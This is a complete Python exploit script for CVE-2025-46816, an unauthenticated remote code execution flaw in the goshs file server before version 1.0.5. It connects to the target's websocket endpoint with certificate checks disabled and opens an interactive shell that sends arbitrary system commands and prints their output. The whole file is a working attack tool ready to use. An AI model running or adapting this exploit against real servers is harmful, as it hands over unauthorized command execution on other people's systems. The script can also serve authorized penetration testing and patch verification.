import ssl
import json
import argparse
import readline
import websockets
from rich import print as rp
from urllib.parse import urlparse
from websockets.sync.client import connect

msg = lambda x, *args, **kw: rp(f"[green]\\[+][/] {x}", *args, **kw)
log = lambda x, *args, **kw: rp(f"[gold3]\\[>][/] {x}", *args, **kw)
err = lambda x, *args, **kw: rp(f"[red]\\[-][/] {x}", *args, **kw)

def parse_opts():
    """
    Parse arguments from user
    """
    parser = argparse.ArgumentParser(description='Goshs exploit Unauthenticated Code Execution')
    parser.add_argument("--target", "-t", help="Target to attack, example: http://ip:port", required=True)
    parser.add_argument("--secure", "-s", help="Use encrypted websocket", action='store_true')
    return parser.parse_args()

def get_unsafe_ssl_context(is_ssl):
    """
    Get an unsafe ssl context
    """
    if not is_ssl:
        return None
    ssl_context = ssl.create_default_context()
    ssl_context.check_hostname = False
    ssl_context.verify_mode = False
    return ssl_context

if __name__ == '__main__':
    args = parse_opts()
    log("Exploit by [gold3]@jrjgjk[/gold3] on [gold3]gosh[/gold3] < 1.0.5 [gold3 u]CVE-2025-46816[/gold3 u]")

    target = urlparse(args.target).netloc
    if not target:
        target = args.target

    proto = "ws" if not args.secure else "wss"
    uri = f"{proto}://{target}/?ws"

    msg(f"Connecting to [b blue]{uri}[/b blue]")

    with websockets.sync.client.connect(uri, ssl=get_unsafe_ssl_context(args.secure)) as ws_client:
        while True:
            cmd = input("\x1b[38;5;178mshell@\x1b[1;37mgoshs:\x1b[0m ")
            if not cmd.strip():
                continue
            if cmd in ["x", "exit", "quit", "q"]:
                log("Bye !")
                break
            payload = {"type": "command", "content": cmd}
            ws_client.send(json.dumps(payload))
            result = ws_client.recv()
            json_res = json.loads(result)
            print(json_res.get("content", "Error"))